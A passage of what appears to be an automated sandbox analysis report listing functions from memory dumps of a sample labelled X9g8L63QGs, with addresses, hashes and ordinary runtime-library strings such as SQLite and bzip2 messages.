                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                                                    • String ID: String too long for BSTR$unicode string expected instead of %s instance
                                                                                                                                                                                                                                                                    • API String ID: 344208780-178309214
                                                                                                                                                                                                                                                                    • Opcode ID: 333dcf3fb14b4492ca0ae43436d3c775c4d9729a31c5a973eee24abc849743e6
                                                                                                                                                                                                                                                                    • Instruction ID: ed128f87e938ae831b86faf5a6e716e00b394d9ea2c1a97a5c02e4b9aef5375b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 333dcf3fb14b4492ca0ae43436d3c775c4d9729a31c5a973eee24abc849743e6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A21E9A5A09F4281EF548B76FC541386762AF9AFE0F14E036E94E43B34DE3CE4988300
                                                                                                                                                                                                                                                                    Function 00007FFB1C2510F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FFB1C255508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFB1C25108E), ref: 00007FFB1C255516
                                                                                                                                                                                                                                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFB1C25112E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: abortterminate
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                                    • API String ID: 661698970-2671469338
                                                                                                                                                                                                                                                                    • Opcode ID: 1e1d061888eb5ed8958d1a3f543fee4a516cb38e8faaed4a66704169c3245728
                                                                                                                                                                                                                                                                    • Instruction ID: 37f027a5dfa13a7d727593ae4a4363ae1fa1fb355954d1f73298aefda2580976
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e1d061888eb5ed8958d1a3f543fee4a516cb38e8faaed4a66704169c3245728
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF08CF2918A0283E7507BB4E1892FE3762EF49B61F299070C74842366CF3CD890C780
                                                                                                                                                                                                                                                                    Function 00007FFB0C06DB10 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1485575833ac080eba873b396e4fec7d0adbbe42a312c587b8f7937f0ac7c60a
                                                                                                                                                                                                                                                                    • Instruction ID: 975df3d2382b3619ca62800f4c4987bb0e04a1ab0cc6c12c182a85d40250b76b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1485575833ac080eba873b396e4fec7d0adbbe42a312c587b8f7937f0ac7c60a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD91BFF1B09B468AEA659F32D558A6923A0FF44BA0F495234EE6D077C5EF3CE410C708
                                                                                                                                                                                                                                                                    Function 00007FFB1C258EC8 Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-0
                                                                                                                                                                                                                                                                    • Opcode ID: 21ceaebb6340b33c2880b1d94455a3a587ac808d2dbe1c8140b81e3c0e4e29dc
                                                                                                                                                                                                                                                                    • Instruction ID: 56ead7670d37914fc795e9190fb6140aee321805e8a7f442711531f2ca6a7d68
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21ceaebb6340b33c2880b1d94455a3a587ac808d2dbe1c8140b81e3c0e4e29dc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86913DE2E08EA28AFB10AB74D8483ED2762BB06768F644035DE4D17795DFBD9845C390
                                                                                                                                                                                                                                                                    Function 00007FFB1C25BB04 Relevance: 6.1, APIs: 4, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0bd3be82ad391ae9cd5c01d857b5e8d25ae8efb4ad2905c542e999dede7c0f10
                                                                                                                                                                                                                                                                    • Instruction ID: a6bc64c2a445d522418e96c2a8ab616c2cb56755342b4e33dd3a9983df2cf87c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bd3be82ad391ae9cd5c01d857b5e8d25ae8efb4ad2905c542e999dede7c0f10
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 714168F2E04B818AE7019F74D4483ED37A1BB49B68F648025DE4C57749DF789840C790
                                                                                                                                                                                                                                                                    Function 00007FFB0C0840F0 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-0
                                                                                                                                                                                                                                                                    • Opcode ID: b93e7d24146e94e90c05e856a74659a5816adcbd1dcfc72995cc6fe0d7043182
                                                                                                                                                                                                                                                                    • Instruction ID: f6d823fa01a35a1dea86b4947f8ba8a98a4007d0188ff27db64542ee6915adb6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b93e7d24146e94e90c05e856a74659a5816adcbd1dcfc72995cc6fe0d7043182
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A219EE2A0874283DA249F26F5555BAA3A1FF44BC0B485131DBCE47F66DF2CE055C304
                                                                                                                                                                                                                                                                    Function 00007FFB1B6FE7C8 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFreeLastLocal
                                                                                                                                                                                                                                                                    • String ID: <no description>$|i:FormatError
                                                                                                                                                                                                                                                                    • API String ID: 3928016487-1632374824
                                                                                                                                                                                                                                                                    • Opcode ID: dbbfa7394e956fac4913724af931672fa89993993dfa9f029aeeddf1fb6a9810
                                                                                                                                                                                                                                                                    • Instruction ID: 9b9eef011fd4627dc6b03f0a274e4b743a0c690e09ba718177ce5632f112495e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbbfa7394e956fac4913724af931672fa89993993dfa9f029aeeddf1fb6a9810
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB0169A1A08E4282EE149B32FC14079A6A3FF55BF0B54E236D96E436F4EE3CD4458600
                                                                                                                                                                                                                                                                    Function 00007FFB1B6F610C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4ab32cd6e4f528cccb9bd86d2be6934b82d58d935ecb871045cd9ac52d02cd60
                                                                                                                                                                                                                                                                    • Instruction ID: 5d3cf7cf13199cb5de0c63e6e48b9e7b906663af484485e8092252deb0627646
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ab32cd6e4f528cccb9bd86d2be6934b82d58d935ecb871045cd9ac52d02cd60
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B111C62B14F018AEF00CB71E8553B833A4F719768F446E36EA6D86BB4DF78D1588340
                                                                                                                                                                                                                                                                    Function 00007FFB0C1AB9FC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                    • Opcode ID: e1338ba137a7be5dbb948f5b1b4ae9a01302a02f2a375ea91944fd86fb812fe8
                                                                                                                                                                                                                                                                    • Instruction ID: 7ff6a7da4ee205b436e8d04d84e7334b43092ffa73002ac3f5216bfacebf035c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1338ba137a7be5dbb948f5b1b4ae9a01302a02f2a375ea91944fd86fb812fe8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 711118B6B14B058AEB008BB1E8586A933B4FF19B58F440E31DA6D867A4DF78D199C340
                                                                                                                                                                                                                                                                    Function 00007FFB1AB041EC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9a9bcaab0169d31b611b93b3b17d643d26cf28526b5f29e8fbd39da941c83064
                                                                                                                                                                                                                                                                    • Instruction ID: d4bdc545eae952c481ffbc110b5cbc5e2873709fa53c1ac0973e24d10e5416c9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a9bcaab0169d31b611b93b3b17d643d26cf28526b5f29e8fbd39da941c83064
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55111F66B14F4189EB10CB70E9942B933B8F719768F440A36DA5D56794EF7CE194C340
                                                                                                                                                                                                                                                                    Function 00007FFB1C260D5C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                    • Opcode ID: 15bdf73cda2f41086707368dd9349a273cb6e4dedd62d10c03f2e51642f891d7
                                                                                                                                                                                                                                                                    • Instruction ID: 03341029d248510da226f377b3e36a38accf363eeeedc6ebcc88243a23bf125e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15bdf73cda2f41086707368dd9349a273cb6e4dedd62d10c03f2e51642f891d7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D111CA6B18F118AEB00EB70E8582E833A5F759768F540E31DEAD467A4DF7CD1588390
                                                                                                                                                                                                                                                                    Function 00007FFB0C05DC84 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2410398255
                                                                                                                                                                                                                                                                    • Opcode ID: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
                                                                                                                                                                                                                                                                    • Instruction ID: cecfcac92f20145e1cfa9448ec2e9c97219fb33c32109cf356eb86edda264a28
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7C1B1E2B0875287FB259A35C288A7E67A0EF11B84F144436CB4E57795FF2CE845C318
                                                                                                                                                                                                                                                                    Function 00007FFB1BB11890 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: %d work, %d block, ratio %5.2f$Q2"e
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-1389944727
                                                                                                                                                                                                                                                                    • Opcode ID: 5e4d09ab0390b8399ab1d5fcd6f54b8213f7fb7fffd6cb6208b0b3ac3218876c
                                                                                                                                                                                                                                                                    • Instruction ID: 55ade5ea2dc760d7d5efb2b0dbf877018f5b8af1e69ce87abcdd1fd74fbe3d52
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e4d09ab0390b8399ab1d5fcd6f54b8213f7fb7fffd6cb6208b0b3ac3218876c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDA1C3B6618A81C7D7298F29F01077E7BA5FB85794F04A235DA5E43BA8CB38E505CB00
                                                                                                                                                                                                                                                                    Function 00007FFB0C0905E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
